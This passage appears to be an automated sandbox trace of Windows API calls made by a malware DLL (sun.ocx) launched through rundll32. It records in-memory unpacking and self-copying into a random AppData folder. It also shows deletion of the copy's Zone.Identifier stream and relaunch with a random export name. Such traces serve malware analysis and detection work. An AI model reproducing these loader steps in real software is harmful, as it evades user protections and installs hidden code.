(lpAddress=0x10026000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10026000 [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] GetLastError () returned 0x0 [0104.119] SetLastError (dwErrCode=0x0) [0104.119] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x26ef18 | out: lpflOldProtect=0x26ef18*=0x4) returned 1 [0104.125] GetLastError () returned 0x0 [0104.125] SetLastError (dwErrCode=0x0) [0104.125] GetLastError () returned 0x0 [0104.125] SetLastError (dwErrCode=0x0) [0104.125] GetLastError () returned 0x0 [0104.125] SetLastError (dwErrCode=0x0) [0104.125] VirtualProtect (in: lpAddress=0x10024000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x26ef18 | out: lpflOldProtect=0x26ef18*=0x4) returned 1 [0104.125] GetLastError () returned 0x0 [0104.125] SetLastError (dwErrCode=0x0) [0104.125] GetLastError () returned 0x0 [0104.125] SetLastError (dwErrCode=0x0) [0104.125] GetLastError () returned 0x0 [0104.126] SetLastError (dwErrCode=0x0) [0104.126] VirtualProtect (in: lpAddress=0x10025000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x26ef18 | out: lpflOldProtect=0x26ef18*=0x4) returned 1 [0104.126] GetLastError () returned 0x0 [0104.126] SetLastError (dwErrCode=0x0) [0104.126] GetLastError () returned 0x0 [0104.126] SetLastError (dwErrCode=0x0) [0104.126] GetLastError () returned 0x0 [0104.126] SetLastError (dwErrCode=0x0) [0104.126] VirtualFree (lpAddress=0x10026000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0104.128] GetLastError () returned 0x0 [0104.128] SetLastError (dwErrCode=0x0) [0104.128] GetLastError () returned 0x0 [0104.128] SetLastError (dwErrCode=0x0) [0104.129] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer" [0104.129] GetProcessHeap () returned 0x4b0000 [0104.129] GetModuleHandleA (lpModuleName="NTDLL") returned 0x779e0000 [0104.130] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x28) returned 0x532c00 [0104.130] lstrcmpiW (lpString1="DllRegisterServer", lpString2="DllRegisterServer") returned 0 [0104.131] GetProcessHeap () returned 0x4b0000 [0104.131] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x532c00 | out: hHeap=0x4b0000) returned 1 [0104.131] GetLastError () returned 0x0 [0104.131] SetLastError (dwErrCode=0x0) [0104.276] DllRegisterServer () [0104.276] GetProcessHeap () returned 0x4b0000 [0104.276] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x40) returned 0x52c220 [0104.276] GetProcessHeap () returned 0x4b0000 [0104.276] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x20) returned 0x534600 [0104.277] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76c20000 [0104.277] GetProcessHeap () returned 0x4b0000 [0104.277] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x534600 | out: hHeap=0x4b0000) returned 1 [0104.277] GetProcessHeap () returned 0x4b0000 [0104.277] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.277] LoadLibraryW (lpLibFileName="bcrypt.dll") returned 0x67df0000 [0104.284] GetProcessHeap () returned 0x4b0000 [0104.284] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.284] GetProcessHeap () returned 0x4b0000 [0104.284] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.284] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x75650000 [0104.291] GetProcessHeap () returned 0x4b0000 [0104.291] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.291] GetProcessHeap () returned 0x4b0000 [0104.291] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.292] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x75cb0000 [0104.292] GetProcessHeap () returned 0x4b0000 [0104.292] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.292] GetProcessHeap () returned 0x4b0000 [0104.292] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.292] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x771d0000 [0104.292] GetProcessHeap () returned 0x4b0000 [0104.292] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.292] GetProcessHeap () returned 0x4b0000 [0104.292] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.292] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x75a80000 [0104.304] GetProcessHeap () returned 0x4b0000 [0104.304] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.304] GetProcessHeap () returned 0x4b0000 [0104.304] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.304] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x72b60000 [0104.304] GetProcessHeap () returned 0x4b0000 [0104.304] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.304] GetProcessHeap () returned 0x4b0000 [0104.305] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x18) returned 0x504208 [0104.305] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x76d80000 [0104.305] GetProcessHeap () returned 0x4b0000 [0104.305] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x504208 | out: hHeap=0x4b0000) returned 1 [0104.305] GetProcessHeap () returned 0x4b0000 [0104.305] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x20) returned 0x510858 [0104.305] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x6fa20000 [0104.322] GetProcessHeap () returned 0x4b0000 [0104.322] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x510858 | out: hHeap=0x4b0000) returned 1 [0104.322] GetProcessHeap () returned 0x4b0000 [0104.322] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x48) returned 0x4d1dc0 [0104.322] GetProcessHeap () returned 0x4b0000 [0104.323] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x4000) returned 0x555ed8 [0104.323] GetProcessHeap () returned 0x4b0000 [0104.323] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x8) returned 0x512fa8 [0104.323] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x26f360, pszAlgId="RNG", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x26f360) returned 0x0 [0104.333] GetProcessHeap () returned 0x4b0000 [0104.333] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x512fa8 | out: hHeap=0x4b0000) returned 1 [0104.333] BCryptGenRandom (in: hAlgorithm=0x520aa0, pbBuffer=0x555ed8, cbBuffer=0x4000, dwFlags=0x0 | out: pbBuffer=0x555ed8) returned 0x0 [0104.337] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x520aa0, dwFlags=0x0 | out: hAlgorithm=0x520aa0) returned 0x0 [0104.337] GetProcessHeap () returned 0x4b0000 [0104.337] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x230) returned 0x522780 [0104.337] GetProcessHeap () returned 0x4b0000 [0104.337] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x440) returned 0x550178 [0104.338] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x0 [0104.342] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5503a8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0104.696] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x26eee8, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx")) returned 0x1a [0104.697] lstrlenW (lpString="C:\\Users\\kEecfMwgj\\sun.ocx") returned 26 [0104.697] lstrcpyW (in: lpString1=0x550194, lpString2="kEecfMwgj\\sun.ocx" | out: lpString1="kEecfMwgj\\sun.ocx") returned="kEecfMwgj\\sun.ocx" [0104.697] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x26f15c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx")) returned 0x1a [0104.697] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer" [0104.697] CommandLineToArgvW (in: lpCmdLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer", pNumArgs=0x26f348 | out: pNumArgs=0x26f348) returned 0x51b888*="C:\\Windows\\SysWOW64\\rundll32.exe" [0104.698] LocalFree (hMem=0x51b888) returned 0x0 [0104.698] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x26f158, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx")) returned 0x1a [0104.698] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx"), dwDesiredAccess=0x80, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0104.698] GetFileInformationByHandleEx (in: hFile=0x1a8, FileInformationClass=0x0, lpFileInformation=0x26f130, dwBufferSize=0x28 | out: lpFileInformation=0x26f130) returned 1 [0104.698] CloseHandle (hObject=0x1a8) returned 1 [0104.699] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f128 | out: lpSystemTimeAsFileTime=0x26f128*(dwLowDateTime=0x7b3af8c0, dwHighDateTime=0x1d806e7)) [0104.699] GetTickCount () returned 0x1b36397 [0104.699] GetCurrentProcessId () returned 0xd98 [0104.699] GetProcessHeap () returned 0x4b0000 [0104.699] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x518000 [0104.700] _snwprintf (in: _Dest=0x26f15c, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0104.700] GetProcessHeap () returned 0x4b0000 [0104.700] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x518000 | out: hHeap=0x4b0000) returned 1 [0104.700] GetProcessHeap () returned 0x4b0000 [0104.700] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x518000 [0104.700] GetTickCount () returned 0x1b36397 [0104.700] _snwprintf (in: _Dest=0x26ef54, _Count=0x104, _Format="%s\\%s%x" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397") returned 61 [0104.700] GetProcessHeap () returned 0x4b0000 [0104.700] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x518000 | out: hHeap=0x4b0000) returned 1 [0104.700] lstrcpyW (in: lpString1=0x26ec40, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" [0104.700] lstrcpyW (in: lpString1=0x26ea38, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397" [0104.700] SHFileOperationW (in: lpFileOp=0x26ee48*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr", pTo="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="捁硴 ") | out: lpFileOp=0x26ee48*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr", pTo="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr1b36397", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="捁硴 ")) returned 124 [0108.958] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x26f15c, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx")) returned 0x1a [0108.958] GetProcessHeap () returned 0x4b0000 [0108.958] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x53ef30 [0108.958] _snwprintf (in: _Dest=0x26ef54, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0108.958] GetProcessHeap () returned 0x4b0000 [0108.958] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x53ef30 | out: hHeap=0x4b0000) returned 1 [0108.958] lstrcpyW (in: lpString1=0x26ec58, lpString2="C:\\Users\\kEecfMwgj\\sun.ocx" | out: lpString1="C:\\Users\\kEecfMwgj\\sun.ocx") returned="C:\\Users\\kEecfMwgj\\sun.ocx" [0108.958] lstrcpyW (in: lpString1=0x26ea50, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" [0108.958] SHFileOperationW (lpFileOp=0x26ee60*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\kEecfMwgj\\sun.ocx", pTo="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="诿뮗假Ā○○")) [0119.967] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr:zone.identifier")) returned 0 [0119.968] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f128 | out: lpSystemTimeAsFileTime=0x26f128*(dwLowDateTime=0x8419d880, dwHighDateTime=0x1d806e7)) [0119.968] GetProcessHeap () returned 0x4b0000 [0119.968] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x10) returned 0x53ef30 [0119.968] _snwprintf (in: _Dest=0x26f158, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0119.969] GetProcessHeap () returned 0x4b0000 [0119.969] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x53ef30 | out: hHeap=0x4b0000) returned 1 [0119.969] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr"), dwDesiredAccess=0x100, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0119.969] SetFileInformationByHandle (hFile=0x1cc, FileInformationClass=0x0, lpFileInformation=0x26f130, dwBufferSize=0x28) returned 1 [0119.969] CloseHandle (hObject=0x1cc) returned 1 [0119.970] WaitForSingleObject (hHandle=0x0, dwMilliseconds=0xffffffff) returned 0xffffffff [0119.970] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x26ef4c | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0119.973] GetProcessHeap () returned 0x4b0000 [0119.973] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x38) returned 0x52ab00 [0119.973] _snwprintf (in: _Dest=0x26f154, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",QxrXksBkO") returned 99 [0119.974] GetProcessHeap () returned 0x4b0000 [0119.974] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x52ab00 | out: hHeap=0x4b0000) returned 1 [0119.974] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",QxrXksBkO", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x26ebcc*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26ec10 | out: lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",QxrXksBkO", lpProcessInformation=0x26ec10*(hProcess=0x29c, hThread=0x2a4, dwProcessId=0xddc, dwThreadId=0xde0)) returned 1 [0120.089] CloseHandle (hObject=0x29c) returned 1 [0120.089] CloseHandle (hObject=0x2a4) returned 1 [0120.089] ExitProcess (uExitCode=0x0) [0120.098] malloc (_Size=0x5f5e100) returned 0x25a0020 [0135.947] atoi (_Str="64") returned 64 [0135.948] atoi (_Str="8192") returned 8192 [0135.948] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x21a0000 [0135.951] malloc (_Size=0x3afd) returned 0x5c9dd8 [0135.952] malloc (_Size=0x3afd) returned 0x5cd8e0 [0135.967] GetLastError () returned 0xcb [0135.968] SetLastError (dwErrCode=0xcb) [0135.968] GetLastError () returned 0xcb [0135.968] SetLastError (dwErrCode=0xcb) [0135.968] GetNativeSystemInfo (in: lpSystemInfo=0x26f3b0 | out: lpSystemInfo=0x26f3b0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0135.968] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0135.968] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x22d0000 [0135.968] GetProcessHeap () returned 0x4b0000 [0135.968] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x34) returned 0x52ad80 [0135.968] VirtualAlloc (lpAddress=0x22d0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22d0000 [0135.969] VirtualAlloc (lpAddress=0x22d1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x22d1000 [0135.972] VirtualAlloc (lpAddress=0x22f4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x22f4000 [0135.972] VirtualAlloc (lpAddress=0x22f5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22f5000 [0135.972] VirtualAlloc (lpAddress=0x22f6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x22f6000 [0136.521] GetLastError () returned 0x1e7 [0136.521] SetLastError (dwErrCode=0x1e7) [0136.521] GetLastError () returned 0x1e7 [0136.521] SetLastError (dwErrCode=0x1e7) [0136.521] GetLastError () returned 0x1e7 [0136.521] SetLastError (dwErrCode=0x1e7) [0136.521] GetLastError () returned 0x1e7 [0136.521] SetLastError (dwErrCode=0x1e7) [0136.521] VirtualProtect (in: lpAddress=0x22d1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x26f288 | out: lpflOldProtect=0x26f288*=0x4) returned 1 [0136.526] GetLastError () returned 0x1e7 [0136.526] SetLastError (dwErrCode=0x1e7) [0136.526] GetLastError () returned 0x1e7 [0136.526] SetLastError (dwErrCode=0x1e7) [0136.527] GetLastError () returned 0x1e7 [0136.527] SetLastError (dwErrCode=0x1e7) [0136.527] VirtualProtect (in: lpAddress=0x22f4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x26f288 | out: lpflOldProtect=0x26f288*=0x4) returned 1 [0136.527] GetLastError () returned 0x1e7 [0136.527] SetLastError (dwErrCode=0x1e7) [0136.527] GetLastError () returned 0x1e7 [0136.527] SetLastError (dwErrCode=0x1e7) [0136.527] GetLastError () returned 0x1e7 [0136.527] SetLastError (dwErrCode=0x1e7) [0136.527] VirtualProtect (in: lpAddress=0x22f5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x26f288 | out: lpflOldProtect=0x26f288*=0x4) returned 1 [0136.527] GetLastError () returned 0x1e7 [0136.528] SetLastError (dwErrCode=0x1e7) [0136.528] GetLastError () returned 0x1e7 [0136.528] SetLastError (dwErrCode=0x1e7) [0136.528] GetLastError () returned 0x1e7 [0136.528] SetLastError (dwErrCode=0x1e7) [0136.528] VirtualFree (lpAddress=0x22f6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0136.532] GetLastError () returned 0x1e7 [0136.532] SetLastError (dwErrCode=0x1e7) [0136.532] GetLastError () returned 0x1e7 [0136.532] SetLastError (dwErrCode=0x1e7) [0136.532] GetLastError () returned 0x1e7 [0136.533] SetLastError (dwErrCode=0x1e7) [0136.533] free (_Block=0x6c2760) Thread: id = 83 os_tid = 0xdb0 Thread: id = 88 os_tid = 0xdc4 [0105.226] malloc (_Size=0x5f5e100) returned 0x2440020 [0108.852] GetLastError () returned 0x1e7 [0108.852] SetLastError (dwErrCode=0x1e7) Thread: id = 89 os_tid = 0xdcc [0108.978] malloc (_Size=0x5f5e100) returned 0x2440020 [0118.348] atoi (_Str="64") returned 64 [0118.348] atoi (_Str="8192") returned 8192 [0118.348] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x20c0000 [0118.351] malloc (_Size=0x3afd) returned 0x5c2700 [0118.352] malloc (_Size=0x3afd) returned 0x5c6208 [0118.361] GetLastError () returned 0x0 [0118.362] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0118.362] GetCurrentThreadId () returned 0xdcc [0118.362] calloc (_Count=0x1, _Size=0xc0) returned 0x5c9d10 [0118.362] GetCurrentThreadId () returned 0xdcc [0118.362] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0118.362] GetCurrentThreadId () returned 0xdcc [0118.362] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0118.362] GetCurrentProcess () returned 0xffffffff [0118.362] GetCurrentThread () returned 0xfffffffe [0118.362] GetCurrentProcess () returned 0xffffffff [0118.362] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5c9d24, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5c9d24*=0x24c) returned 1 [0118.363] GetThreadPriority (hThread=0x24c) returned 0 [0118.363] SetLastError (dwErrCode=0x0) [0118.363] GetLastError () returned 0x0 [0118.363] realloc (_Block=0x0, _Size=0x4) returned 0x6c2c38 [0118.363] realloc (_Block=0x0, _Size=0x1) returned 0x6c2c48 [0118.363] SetLastError (dwErrCode=0x0) [0118.363] GetNativeSystemInfo (in: lpSystemInfo=0x234f45c | out: lpSystemInfo=0x234f45c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0118.363] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0118.363] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000 [0118.363] GetProcessHeap () returned 0x4b0000 [0118.363] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x34) returned 0x52ac00 [0118.363] VirtualAlloc (lpAddress=0x20f0000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x20f0000 [0118.364] VirtualAlloc (lpAddress=0x20f1000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x20f1000 [0118.366] VirtualAlloc (lpAddress=0x2114000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2114000 [0118.366] VirtualAlloc (lpAddress=0x2115000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2115000 [0118.367] VirtualAlloc (lpAddress=0x2116000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2116000 [0118.367] GetLastError () returned 0x1e7 [0118.367] SetLastError (dwErrCode=0x1e7) [0118.367] GetLastError () returned 0x1e7 [0118.367] SetLastError (dwErrCode=0x1e7) [0118.367] GetLastError () returned 0x1e7 [0118.367] SetLastError (dwErrCode=0x1e7) [0118.367] GetLastError () returned 0x1e7 [0118.367] SetLastError (dwErrCode=0x1e7) [0118.367] VirtualProtect (in: lpAddress=0x20f1000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x234f334 | out: lpflOldProtect=0x234f334*=0x4) returned 1 [0118.371] GetLastError () returned 0x1e7 [0118.371] SetLastError (dwErrCode=0x1e7) [0118.371] GetLastError () returned 0x1e7 [0118.371] SetLastError (dwErrCode=0x1e7) [0118.371] GetLastError () returned 0x1e7 [0118.371] SetLastError (dwErrCode=0x1e7) [0118.371] VirtualProtect (in: lpAddress=0x2114000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x234f334 | out: lpflOldProtect=0x234f334*=0x4) returned 1 [0118.371] GetLastError () returned 0x1e7 [0118.371] SetLastError (dwErrCode=0x1e7) [0118.371] GetLastError () returned 0x1e7 [0118.371] SetLastError (dwErrCode=0x1e7) [0118.372] GetLastError () returned 0x1e7 [0118.372] SetLastError (dwErrCode=0x1e7) [0118.372] VirtualProtect (in: lpAddress=0x2115000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x234f334 | out: lpflOldProtect=0x234f334*=0x4) returned 1 [0118.372] GetLastError () returned 0x1e7 [0118.372] SetLastError (dwErrCode=0x1e7) [0118.372] GetLastError () returned 0x1e7 [0118.372] SetLastError (dwErrCode=0x1e7) [0118.372] GetLastError () returned 0x1e7 [0118.372] SetLastError (dwErrCode=0x1e7) [0118.372] VirtualFree (lpAddress=0x2116000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0118.390] GetLastError () returned 0x1e7 [0118.390] SetLastError (dwErrCode=0x1e7) [0118.390] GetLastError () returned 0x1e7 [0118.391] SetLastError (dwErrCode=0x1e7) [0118.391] GetLastError () returned 0x1e7 [0118.391] SetLastError (dwErrCode=0x1e7) Thread: id = 91 os_tid = 0xdec Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = 